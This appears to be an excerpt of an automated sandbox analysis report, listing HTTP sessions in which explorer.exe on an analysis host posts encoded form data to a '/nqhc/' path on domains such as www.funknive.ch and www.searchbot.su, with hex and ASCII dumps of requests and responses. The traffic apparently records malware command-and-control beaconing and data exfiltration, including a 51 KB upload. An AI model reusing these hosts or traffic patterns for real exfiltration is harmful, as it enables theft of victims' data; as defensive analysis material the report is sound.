                                                                                                                                                                          Server: nginx
                                                                                                                                                                          Date: Mon, 05 Dec 2022 14:17:01 GMT
                                                                                                                                                                          Content-Type: text/html; charset=utf-8
                                                                                                                                                                          Content-Length: 1840
                                                                                                                                                                          Last-Modified: Tue, 04 Apr 2017 13:56:46 GMT
                                                                                                                                                                          Connection: close
                                                                                                                                                                          ETag: "58e3a61e-730"
                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                          Dec 5, 2022 15:17:01.556291103 CET11706INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74
                                                                                                                                                                          Data Ascii: <!DOCTYPE html><html lang="en"> <head> <meta charset="utf-8"> <meta http-equiv="X-UA-Compatible" content="IE=edge"> <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"> ... The above 3 meta
                                                                                                                                                                          Dec 5, 2022 15:17:01.556406021 CET11706INData Raw: 63 63 65 73 73 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 6a 6f 6b 65 72 2e 63 6f 6d 2f 3f 70 6b 5f 63 61 6d 70 61 69 67 6e 3d 50 61 72 6b 69 6e 67 26 70 6b 5f 6b 77 64 3d 74 65 78 74 22 20 72 6f 6c 65 3d 22 62 75 74 74 6f 6e 22 3e 4a 4f 4b
                                                                                                                                                                          Data Ascii: ccess" href="https://joker.com/?pk_campaign=Parking&pk_kwd=text" role="button">JOKER.COM</a></p> </div> <footer class="footer"> <p>&copy; 2017 CSL GmbH / JOKER.COM</p> </footer> </div> ... /container -->


                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                          39192.168.11.2049880185.101.158.23980C:\Windows\explorer.exe
                                                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                                                          Dec 5, 2022 15:17:06.618046045 CET11708OUTPOST /nqhc/ HTTP/1.1
                                                                                                                                                                          Host: www.funknive.ch
                                                                                                                                                                          Connection: close
                                                                                                                                                                          Content-Length: 187
                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                          Origin: http://www.funknive.ch
                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                          Accept: */*
                                                                                                                                                                          Referer: http://www.funknive.ch/nqhc/
                                                                                                                                                                          Accept-Language: en-US
                                                                                                                                                                          Accept-Encoding: gzip, deflate
                                                                                                                                                                          Data Raw: 37 6e 57 48 56 3d 68 4e 41 6f 7a 4a 5a 58 6a 5a 4f 6b 7e 4f 61 78 46 4a 6b 4a 55 68 76 31 64 68 65 6e 71 4b 52 56 59 6b 55 63 6f 5a 36 64 57 61 44 30 54 55 63 58 55 78 7a 56 33 45 48 33 66 4a 39 47 64 57 6a 44 43 79 39 56 76 72 51 63 48 72 30 69 72 47 48 73 61 6d 56 41 62 67 63 75 52 45 70 76 44 5f 67 4f 69 51 69 4c 61 46 70 34 6b 4e 48 71 4f 73 6b 59 4f 79 48 36 53 45 70 72 68 49 49 6a 4a 64 38 72 6a 34 59 72 35 65 6c 38 6f 37 6e 77 4e 41 42 43 78 55 58 5a 33 63 76 6b 71 68 54 33 31 47 6a 5f 70 78 28 39 37 30 30 69 72 61 76 6e 65 72 47 30 52 41 29 2e 00 00 00 00 00 00 00 00
                                                                                                                                                                          Data Ascii: 7nWHV=hNAozJZXjZOk~OaxFJkJUhv1dhenqKRVYkUcoZ6dWaD0TUcXUxzV3EH3fJ9GdWjDCy9VvrQcHr0irGHsamVAbgcuREpvD_gOiQiLaFp4kNHqOskYOyH6SEprhIIjJd8rj4Yr5el8o7nwNABCxUXZ3cvkqhT31Gj_px(9700iravnerG0RA).
                                                                                                                                                                          Dec 5, 2022 15:17:06.635468006 CET11708INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                          Server: nginx
                                                                                                                                                                          Date: Mon, 05 Dec 2022 14:17:06 GMT
                                                                                                                                                                          Content-Type: text/html
                                                                                                                                                                          Content-Length: 162
                                                                                                                                                                          Connection: close
                                                                                                                                                                          Location: https://www.funknive.ch/nqhc/
                                                                                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                          Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                          4192.168.11.204983845.130.41.2480C:\Windows\explorer.exe
                                                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                                                          Dec 5, 2022 15:15:02.834558010 CET11089OUTPOST /nqhc/ HTTP/1.1
                                                                                                                                                                          Host: www.searchbot.su
                                                                                                                                                                          Connection: close
                                                                                                                                                                          Content-Length: 527
                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                          Origin: http://www.searchbot.su
                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                          Accept: */*
                                                                                                                                                                          Referer: http://www.searchbot.su/nqhc/
                                                                                                                                                                          Accept-Language: en-US
                                                                                                                                                                          Accept-Encoding: gzip, deflate
                                                                                                                                                                          Data Raw: 37 6e 57 48 56 3d 39 6a 5a 50 44 69 71 45 4a 47 6e 31 77 35 58 63 4b 78 6a 33 4a 4d 74 72 55 4a 61 52 6c 55 4b 56 30 70 74 4f 30 50 6f 36 35 37 71 38 66 37 30 44 6d 49 4a 38 44 57 66 6c 32 4a 69 76 37 76 75 4b 30 4e 6f 54 33 48 4c 61 63 59 70 58 48 53 4c 33 4a 68 6c 2d 42 54 66 4a 49 55 43 61 36 57 31 51 32 69 79 6f 35 59 51 50 73 4f 4b 4f 45 36 74 66 36 78 47 36 63 69 48 6c 57 6a 61 79 73 79 66 4e 6c 49 47 6f 4f 61 34 4d 78 32 71 51 34 54 63 59 44 69 6d 5a 6d 36 31 6e 37 63 79 46 4c 58 45 49 59 45 5a 79 55 77 73 34 7e 75 46 42 56 4d 34 5a 58 66 38 5f 50 32 32 6b 56 4c 50 52 6e 55 35 48 4f 54 48 65 51 6c 35 65 59 4c 76 58 4b 36 62 30 55 50 55 46 6d 7a 65 36 4f 33 33 74 47 43 73 6e 56 48 73 30 6f 76 71 30 6c 6d 78 4b 5a 36 71 38 67 72 6d 37 58 6b 30 46 54 6d 6a 6b 77 79 59 61 39 55 6f 54 71 78 44 73 50 6d 71 46 47 79 5a 48 66 6d 30 76 51 72 44 42 61 52 4c 2d 52 6e 56 30 78 31 53 53 50 71 32 77 62 67 4c 44 53 2d 34 44 55 43 6a 66 69 4c 7a 44 78 45 34 55 7a 58 39 44 4a 71 47 48 4a 4d 37 78 62 44 68 77 54 61 57 59 61 41 6f 48 63 36 78 34 33 4c 7e 69 6d 59 7a 79 73 4e 45 70 6c 4c 6b 67 78 6f 4e 61 36 5f 62 65 71 33 31 6f 74 43 6b 78 65 75 32 69 6e 6d 78 69 6e 72 56 67 48 72 35 7a 34 70 74 6e 54 67 4a 45 6d 61 78 75 37 36 47 56 44 31 39 49 68 61 42 7a 5a 64 7a 58 6b 42 34 5a 7a 47 54 57 4b 76 79 5f 28 37 72 67 65 49 4a 62 44 78 42 51 77 72 46 72 50 7a 76 33 4d 31 46 4d 39 76 50 35 55 4f 69 76 79 2d 65 32 33 31 47 6d 44 46 4a 48 6b 6d 76 56 63 70 4a 46 71 4c 69 31 69 50 4a 76 45 36 53 74 4d 51 43 4e 72 69 38 5f 4e 79 56 6a 74 39 63 66 54 73 6f 57 64 68 6f 2e 00 00 00 00 00 00 00 00
                                                                                                                                                                          Data Ascii: 7nWHV=9jZPDiqEJGn1w5XcKxj3JMtrUJaRlUKV0ptO0Po657q8f70DmIJ8DWfl2Jiv7vuK0NoT3HLacYpXHSL3Jhl-BTfJIUCa6W1Q2iyo5YQPsOKOE6tf6xG6ciHlWjaysyfNlIGoOa4Mx2qQ4TcYDimZm61n7cyFLXEIYEZyUws4~uFBVM4ZXf8_P22kVLPRnU5HOTHeQl5eYLvXK6b0UPUFmze6O33tGCsnVHs0ovq0lmxKZ6q8grm7Xk0FTmjkwyYa9UoTqxDsPmqFGyZHfm0vQrDBaRL-RnV0x1SSPq2wbgLDS-4DUCjfiLzDxE4UzX9DJqGHJM7xbDhwTaWYaAoHc6x43L~imYzysNEplLkgxoNa6_beq31otCkxeu2inmxinrVgHr5z4ptnTgJEmaxu76GVD19IhaBzZdzXkB4ZzGTWKvy_(7rgeIJbDxBQwrFrPzv3M1FM9vP5UOivy-e231GmDFJHkmvVcpJFqLi1iPJvE6StMQCNri8_NyVjt9cfTsoWdho.
                                                                                                                                                                          Dec 5, 2022 15:15:02.921298027 CET11089INHTTP/1.1 404 Not Found
                                                                                                                                                                          Server: nginx-reuseport/1.21.1
                                                                                                                                                                          Date: Mon, 05 Dec 2022 14:15:02 GMT
                                                                                                                                                                          Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                          Connection: close
                                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                                          Content-Encoding: gzip
                                                                                                                                                                          Data Raw: 65 39 0d 0a 1f 8b 08 00 00 00 00 00 00 03 4d 8f c1 6a c3 30 10 44 ef fe 8a 6d 4e cd a1 5a 27 b8 d0 83 10 b4 b1 43 03 4e 6a 1a f9 90 a3 12 6d 90 21 b1 5c 49 ae db bf af ec 50 c8 65 61 76 df 0e 33 fc 21 ff 58 c9 43 55 c0 bb dc 96 50 d5 6f e5 66 05 b3 27 c4 4d 21 d7 88 b9 cc 6f 97 25 4b 11 8b dd 4c 24 dc 84 eb 45 70 43 4a 47 11 9a 70 21 91 a5 19 ec 6c 80 b5 ed 5b cd f1 b6 4c 38 4e 10 3f 5a fd 3b fe 2d c4 1d 13 55 c2 3b 21 0d 81 a3 af 9e 7c 20 0d f5 67 09 83 f2 d0 46 ee 3c 72 60 5b 08 a6 f1 e0 c9 7d 93 63 1c bb d1 c9 c5 a1 b4 76 e4 bd 78 ed d4 c9 10 2e 59 c6 9e 17 f0 58 b7 cd cf 1c f6 13 0e 2a c0 30 0c cc 93 72 27 73 b4 81 f9 1e 2a eb 02 bc a4 1c ff 0d 62 ce 29 61 cc 34 36 4b fe 00 08 94 dc 0d 14 01 00 00 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                          Data Ascii: e9Mj0DmNZ'CNjm!\IPeav3!XCUPof'M!o%KL$EpCJGp!l[L8N?Z;-U;!| gF<r`[}cvx.YX*0r's*b)a46K0


                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                          40192.168.11.2049881185.101.158.23980C:\Windows\explorer.exe
                                                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                                                          Dec 5, 2022 15:17:08.659539938 CET11709OUTPOST /nqhc/ HTTP/1.1
                                                                                                                                                                          Host: www.funknive.ch
                                                                                                                                                                          Connection: close
                                                                                                                                                                          Content-Length: 527
                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                          Origin: http://www.funknive.ch
                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                          Accept: */*
                                                                                                                                                                          Referer: http://www.funknive.ch/nqhc/
                                                                                                                                                                          Accept-Language: en-US
                                                                                                                                                                          Accept-Encoding: gzip, deflate
                                                                                                                                                                          Data Raw: 37 6e 57 48 56 3d 68 4e 41 6f 7a 4a 5a 58 6a 5a 4f 6b 78 4f 71 78 45 75 77 4a 46 78 76 79 42 78 65 6e 6b 71 51 53 59 6b 6f 63 6f 59 7e 4e 57 6f 58 30 64 56 73 58 58 77 7a 56 6b 30 48 33 4e 70 39 48 5a 57 6a 59 43 79 35 33 76 70 45 63 48 72 67 69 70 30 50 73 53 32 56 42 44 77 63 68 59 6b 70 71 48 5f 67 41 69 51 76 67 61 45 39 34 6b 63 28 71 50 74 49 59 4c 6a 48 6c 57 6b 6f 67 6e 49 49 67 43 39 38 6c 6a 5f 52 55 35 62 4a 47 6f 4b 6a 77 4e 67 68 43 67 6b 58 61 39 73 76 6e 31 52 53 56 6b 58 43 37 73 52 28 32 69 78 55 36 73 62 4f 56 4c 59 6e 34 42 49 6c 4b 6f 70 48 2d 49 6d 55 68 28 48 4f 45 35 61 75 4c 51 71 6a 36 58 77 42 50 42 36 67 59 71 34 6d 5a 7e 30 68 31 33 66 58 49 6a 4c 54 36 75 4e 6a 48 4a 66 66 65 6c 70 6d 32 55 73 4f 30 73 4e 35 67 35 79 4f 69 70 61 46 48 51 38 6c 48 58 33 6b 64 37 2d 34 6c 79 63 66 6f 64 69 79 31 6b 6e 28 34 72 37 6d 75 4d 4d 34 53 31 55 54 4e 67 72 6b 4c 47 69 28 51 63 6c 79 76 77 74 64 69 4c 44 54 34 75 59 62 36 45 74 4a 65 58 58 71 39 71 77 54 56 56 7a 64 30 63 5f 49 59 6e 6b 41 4c 62 75 4d 67 51 31 63 43 76 6f 37 65 71 48 69 41 55 52 37 32 78 4f 34 62 4f 41 77 6b 68 78 78 6c 53 6d 65 61 35 77 43 4d 6b 35 49 66 51 6b 6d 4f 6c 6e 32 4d 6b 78 7e 48 70 73 68 59 41 38 4f 53 42 75 35 70 62 71 50 6b 42 68 66 4c 6d 34 35 71 31 56 64 70 72 7a 5a 33 66 51 28 50 34 51 54 58 49 54 59 77 4f 50 71 57 72 4f 66 35 33 59 78 32 76 6d 7e 59 5a 79 30 33 71 58 4b 45 6d 4d 75 43 7e 4d 69 79 58 4f 36 5f 63 4e 38 68 50 4c 34 48 57 66 4a 33 52 51 6b 54 68 7a 51 45 6f 39 72 36 68 42 38 4b 6d 4e 59 38 76 6f 6d 4c 58 36 7e 4d 71 42 52 49 6e 38 34 2e 00 00 00 00 00 00 00 00
                                                                                                                                                                          Data Ascii: 7nWHV=hNAozJZXjZOkxOqxEuwJFxvyBxenkqQSYkocoY~NWoX0dVsXXwzVk0H3Np9HZWjYCy53vpEcHrgip0PsS2VBDwchYkpqH_gAiQvgaE94kc(qPtIYLjHlWkognIIgC98lj_RU5bJGoKjwNghCgkXa9svn1RSVkXC7sR(2ixU6sbOVLYn4BIlKopH-ImUh(HOE5auLQqj6XwBPB6gYq4mZ~0h13fXIjLT6uNjHJffelpm2UsO0sN5g5yOipaFHQ8lHX3kd7-4lycfodiy1kn(4r7muMM4S1UTNgrkLGi(QclyvwtdiLDT4uYb6EtJeXXq9qwTVVzd0c_IYnkALbuMgQ1cCvo7eqHiAUR72xO4bOAwkhxxlSmea5wCMk5IfQkmOln2Mkx~HpshYA8OSBu5pbqPkBhfLm45q1VdprzZ3fQ(P4QTXITYwOPqWrOf53Yx2vm~YZy03qXKEmMuC~MiyXO6_cN8hPL4HWfJ3RQkThzQEo9r6hB8KmNY8vomLX6~MqBRIn84.
                                                                                                                                                                          Dec 5, 2022 15:17:08.676209927 CET11710INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                          Server: nginx
                                                                                                                                                                          Date: Mon, 05 Dec 2022 14:17:08 GMT
                                                                                                                                                                          Content-Type: text/html
                                                                                                                                                                          Content-Length: 162
                                                                                                                                                                          Connection: close
                                                                                                                                                                          Location: https://www.funknive.ch/nqhc/
                                                                                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                          Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                          41192.168.11.2049882185.101.158.23980C:\Windows\explorer.exe
                                                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                                                          Dec 5, 2022 15:17:10.719192982 CET11717OUTPOST /nqhc/ HTTP/1.1
                                                                                                                                                                          Host: www.funknive.ch
                                                                                                                                                                          Connection: close
                                                                                                                                                                          Content-Length: 51815
                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                          Origin: http://www.funknive.ch
                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                          Accept: */*
                                                                                                                                                                          Referer: http://www.funknive.ch/nqhc/
                                                                                                                                                                          Accept-Language: en-US
                                                                                                                                                                          Accept-Encoding: gzip, deflate
                                                                                                                                                                          Data Raw: 37 6e 57 48 56 3d 68 4e 41 6f 7a 4a 5a 58 6a 5a 4f 6b 78 4f 71 78 45 75 77 4a 46 78 76 79 42 78 65 6e 6b 71 51 53 59 6b 6f 63 6f 59 7e 4e 57 6f 76 30 64 6a 77 58 56 54 4c 56 31 45 48 33 57 70 39 4b 5a 57 69 59 43 32 74 7a 76 70 59 69 48 70 59 69 70 6e 33 73 54 46 78 42 57 41 63 73 64 6b 70 6f 44 5f 67 55 69 51 6a 30 61 45 70 6f 6b 4d 6a 71 4f 74 34 59 4f 51 28 36 4c 45 70 72 6e 49 49 73 47 39 39 59 6a 35 4e 45 35 62 4e 47 6f 49 6e 77 66 6d 6c 43 77 6b 72 61 36 38 76 34 37 78 53 65 39 48 43 53 73 52 61 48 69 78 55 31 73 5a 69 56 4c 62 76 34 54 5f 52 4e 70 4a 48 2d 57 32 55 67 73 53 57 49 35 61 44 49 51 71 37 36 58 79 52 50 41 61 67 59 34 74 61 57 7a 45 68 33 38 5f 58 62 31 37 66 69 75 4a 44 35 4a 66 37 65 6b 5a 79 32 53 62 36 30 6a 50 42 67 6d 69 4f 67 6e 36 46 59 62 63 6b 63 58 33 30 5f 37 5f 59 31 79 66 54 6f 62 77 36 31 68 47 28 37 74 62 6d 73 53 38 35 61 6a 55 50 4a 67 72 30 58 47 69 28 2d 63 6b 6d 76 33 64 42 69 4b 47 7a 37 74 49 62 35 43 74 49 63 5a 48 57 7a 71 77 66 4f 56 7a 46 61 63 38 45 59 32 30 41 4c 65 4a 51 76 61 46 64 72 79 34 37 4d 6b 6e 6a 49 55 52 33 41 78 4c 49 4c 4f 51 63 6b 67 42 68 6c 44 47 65 5a 79 77 44 6b 76 5a 49 64 61 30 6d 4f 6c 6e 4c 37 6b 30 6d 48 70 39 5a 59 42 4c 71 53 45 39 52 70 57 4b 50 6d 42 68 66 34 6d 34 31 6e 31 56 56 32 72 7a 70 52 66 53 7a 50 34 6b 58 58 50 57 73 33 59 50 71 58 67 75 66 55 6f 49 39 68 76 6d 69 41 5a 79 6c 41 74 6b 7e 45 30 38 7e 43 70 73 6a 6b 43 65 36 30 57 74 38 7a 59 37 30 4c 57 65 67 41 52 52 68 49 68 79 30 45 70 63 75 36 39 69 68 54 6c 5f 59 7a 67 59 36 41 59 34 36 6a 78 69 52 41 39 38 39 54 79 50 42 69 47 46 66 6a 62 45 36 54 52 53 7a 73 65 78 31 7a 53 63 41 67 6b 62 6e 4a 4d 53 68 5a 65 4d 39 32 76 58 56 46 4f 56 70 55 34 79 57 4d 32 6a 30 69 47 58 58 74 6c 55 5a 45 50 51 30 47 43 36 38 34 5a 74 36 53 6e 44 5a 32 7a 45 66 34 44 73 6a 30 53 4d 37 70 45 5a 49 52 6e 70 6b 49 50 4f 6a 68 6d 7a 73 53 32 62 48 57 63 70 36 6d 54 6e 61 77 67 56 61 35 5a 43 5a 4c 5a 5a 7a 74 4a 5a 4d 55 46 36 6b 43 4b 62 6c 2d 4a 57 37 52 55 6b 68 32 56 7a 5a 36 4a 47 55 77 4b 4f 54 4b 6d 4a 36 64 38 51 75 4b 35 42 42 7a 72 73 47 44 6e 4c 34 4a 66 5f 73 47 77 4a 66 76 36 69 54 31 49 47 34 31 7a 7a 7a 55 6a 34 56 39 65 73 57 54 71 36 49 67 31 76 63 58 32 31 41 39 6e 69 4c 74 4e 68 6e 7a 34 75 35 2d 6d 78 51 56 31 6a 4b 5a 5a 65 47 33 56 7a 62 63 74 4a 70 6e 4a 64 4a 68 78 4c 30 39 37 4c 41 79 45 6a 73 47 73 63 49 33 58 42 58 55 6a 6a 6a 68 48 5f 64 54 35 6b 4b 7a 52 72 6d 53 49 31 58 2d 71 4b 46 44 4b 71 74 48 33 66 41 73 4f 74 71 72 6c 48 7a 34 33 4b 79 4e 41 44 7a 37 47 33 67 4e 54 79 76 79 6d 37 6f 67 54 54 6b 72 78 55 75 70 69 41 33 7a 36 49 6b 7a 34 63 69 64 38 4e 71 31 71 71 53 38 6b 4b 51 58 45 4d 68 34 36 39 53 38 64 4d 46 43 4c 62 36 5a 62 66 28 4e 50 50 76 52 62 33 55 35 4e 30 58 4b 50 74 64 63 5a 4b 33 42 51 38 49 33 37 6d 4a 57 51 47 32 6a 6e 65 7e 33 70 6e 39 74 4a 71 43 47 34 6b 55 50 76 6e 79 51 37 37 34 4a 34 68 47 43 78 41 7a 68 6b 5a 31 49 33 39 67 47 63 65 74 42 47 49 68 2d 73 79 59 49 43 37 41 73 72 4a 65 33 43 43 38 6b 6b 4a 50 6a 59 6b 70 78 52 4b 53 67 7e 4f 28 46 76 70 45 71 31 6a 59 6a 4d 41 4d 49 76 70 36 33 78 31 34 47 7e 32 55 31 7e 61 6f 57 63 6f 33 39 53 64 53 6b 39 62 39 37 77 66 76 6a 4c 42 74 61 67 57 64 38 72 5f 52 78 6b 4f 6b 32 4e 5f 4a 78 62 7a 49 6c 34 43 67 5a 4c 6e 70 51 56 74 34 49 39 64 4e 54 79 32 6f 4a 49 4b 56 46 48 5a 51 34 78 46 75 47 32 49 64 50 46 63 57 50 41 61 72 72 75 6e 4b 4d 43 44 32 38 5a 76 6f 41 34 38 37 37 39 5a 63 43 75 4d 6c 55 33 46 51 33 6f 56 32 59 46 33 58 34 33 52 38 44 79 74 52 39 4f 55 62 79 63 65 4f 64 4e 44 56 44 73 64 53 64 67 4f 4e 57 76 48 67 77 65 53 44 32 47 6a 67 77 73 75 43 4a 43 61 36 62 38 61 6f 6a 36 50 4e 43 78 4b 7e 4e 72 69 33 73 32 56 6d 6c 7e 50 73 32 4d 33 70 72 69 70 54 74 43 71 54 51 46 50 65 41 57 41 36 6b 48 71 7e 6e 47 44 75 6f 38 59 32 38 74 66 67 51 6c 5f 30 77 54 4c 39 78 6a 78 34 36 71 63 31 41 37 55 45 52 37 62 38 4b 7e 78 72 38 50 65 70 76 69 64 56 57 67 31 35 52 6f 72 75 38 63 36 64 73 6b 33 72 42 56 4f 52 66 65 4b 66 75 46 38 5a 61 50 65 4c 75 76 31 48 59 57 5a 6d 61 4b 6f 36 66 28
                                                                                                                                                                          Data Ascii: 7nWHV=hNAozJZXjZOkxOqxEuwJFxvyBxenkqQSYkocoY~NWov0djwXVTLV1EH3Wp9KZWiYC2tzvpYiHpYipn3sTFxBWAcsdkpoD_gUiQj0aEpokMjqOt4YOQ(6LEprnIIsG99Yj5NE5bNGoInwfmlCwkra68v47xSe9HCSsRaHixU1sZiVLbv4T_RNpJH-W2UgsSWI5aDIQq76XyRPAagY4taWzEh38_Xb17fiuJD5Jf7ekZy2Sb60jPBgmiOgn6FYbckcX30_7_Y1yfTobw61hG(7tbmsS85ajUPJgr0XGi(-ckmv3dBiKGz7tIb5CtIcZHWzqwfOVzFac8EY20ALeJQvaFdry47MknjIUR3AxLILOQckgBhlDGeZywDkvZIda0mOlnL7k0mHp9ZYBLqSE9RpWKPmBhf4m41n1VV2rzpRfSzP4kXXPWs3YPqXgufUoI9hvmiAZylAtk~E08~CpsjkCe60Wt8zY70LWegARRhIhy0Epcu69ihTl_YzgY6AY46jxiRA989TyPBiGFfjbE6TRSzsex1zScAgkbnJMShZeM92vXVFOVpU4yWM2j0iGXXtlUZEPQ0GC684Zt6SnDZ2zEf4Dsj0SM7pEZIRnpkIPOjhmzsS2bHWcp6mTnawgVa5ZCZLZZztJZMUF6kCKbl-JW7RUkh2VzZ6JGUwKOTKmJ6d8QuK5BBzrsGDnL4Jf_sGwJfv6iT1IG41zzzUj4V9esWTq6Ig1vcX21A9niLtNhnz4u5-mxQV1jKZZeG3VzbctJpnJdJhxL097LAyEjsGscI3XBXUjjjhH_dT5kKzRrmSI1X-qKFDKqtH3fAsOtqrlHz43KyNADz7G3gNTyvym7ogTTkrxUupiA3z6Ikz4cid8Nq1qqS8kKQXEMh469S8dMFCLb6Zbf(NPPvRb3U5N0XKPtdcZK3BQ8I37mJWQG2jne~3pn9tJqCG4kUPvnyQ774J4hGCxAzhkZ1I39gGcetBGIh-syYIC7AsrJe3CC8kkJPjYkpxRKSg~O(FvpEq1jYjMAMIvp63x14G~2U1~aoWco39SdSk9b97wfvjLBtagWd8r_RxkOk2N_JxbzIl4CgZLnpQVt4I9dNTy2oJIKVFHZQ4xFuG2IdPFcWPAarrunKMCD28ZvoA48779ZcCuMlU3FQ3oV2YF3X43R8DytR9OUbyceOdNDVDsdSdgONWvHgweSD2GjgwsuCJCa6b8aoj6PNCxK~Nri3s2Vml~Ps2M3pripTtCqTQFPeAWA6kHq~nGDuo8Y28tfgQl_0wTL9xjx46qc1A7UER7b8K~xr8PepvidVWg15Roru8c6dsk3rBVORfeKfuF8ZaPeLuv1HYWZmaKo6f(iuhUypgaILhRQf3aIGBg5fgE-bZMxILiEeD8Xl0tKUSFvh6EMHnYNUhTA4Ko4bMLqxsRSUNinQyN72UEqCHahjW5JTyy0uclxEari(Fy0aXpxFMSJgv0SKil7ciWT~8r5r76MI3~Cgbfqo5Nzh1wcR744U5Xq9CyT2OD8fE4B8colbBJKzxWtYFr2xba4u5ET(EIT8Q3G5fLk4kNoiNfCu9rMy35NsAdczDfwxBw36KMBahU_g3iPveECkKjX4lX1oFtmZbEmZLVk(Hx0q5B44HAHie(SGoyvMzIU8zXunJuQcnyx6sfuH5~vX0GWLVjgatLpzHUU9tFtGCFg1AH_xjGxw-I310ZNlb0IPQ~C7093r72TpUTSlwwf(NsXmKTX61lIxJfbQSlRvrtO78yepQJdKlnjJpmKlZ7cZ4NYn6qWZUYul5RgqUcOi_TZt_eHVQ4TISF8mlOgHXgvgIHtCUTu~zuMcdZxmr5d43L5v57_Y64fL7Yw24TZbvGQ77bg013t2BM5utwx5Va2iY1_b6Jp7TmOSrQSc4fklQY0W-6mF-OCarAQ66HfAlT1lkHdbJSN2KZZPNAx~3lCgSohzVE54pff9aJx~EcadOw03oHAclN_~K97A6~u8lGCJO(Nm5g59CY2QuX8k7~XPdf3VYr41cPfwi5wJg3Z837j8exMDAW2v-3W2dGcQ9v6xJovA9V_X9TW~zDSUWfwqgkQlEHPLsgCQfpTo3vq(1cCCeEAF9oFCn69fN5HcyAyXjkgfWGwSIgT1iRFnSC8~eRnh1JK1zIw0ZBgpyRGvuDl2JHI4Ns5RgoG~-jhHxj5(V9YdIj2gzhXrS61wbPRfhjy9njakz8MZvhVcxZgRm(wmBwh3ndMvChTCGPoWAGew_B962BvzgT2oIO9nCsInhX-nP(OLz5Jrh51Qng91q9RX3f3MabEez~SVrxu7xa2sz9uB-441j(0JzdqjwW7501SG_CLBc22a8bTtgXBhjc8L7YdJCmWUCgarQTwuKxlsK1otHjaA-K0pjyHcZDe4QiNuVv0LWn60R91yVMLCdRqvxwoVGr5MLj9mRQ3JQuYXWZtg01YcXncGueQOSxCqCHVz2LxWnDAPGxZrI~z9JFQISoqv-QpO1IVjwkJQJ~V(_m6H5K10PmzoJJpCB(MVUqnC-ZIMaz5k-SvvtJ6NFUxgyZjI8gVNcjpJ1M7M4yyojYtyhVgzjhKlhf9A2Ffr6zCdRxmTb(7OdFQaxvhswOhxuVTfyvaWR3WKnx7liCLeRBiZPnoKHhSfHnKjlc2TAIxVczAOZUxcmtfrD~6whS5UgDU1JbYIyL19U3S35qRDBR_w2RuwI1ESQMB~h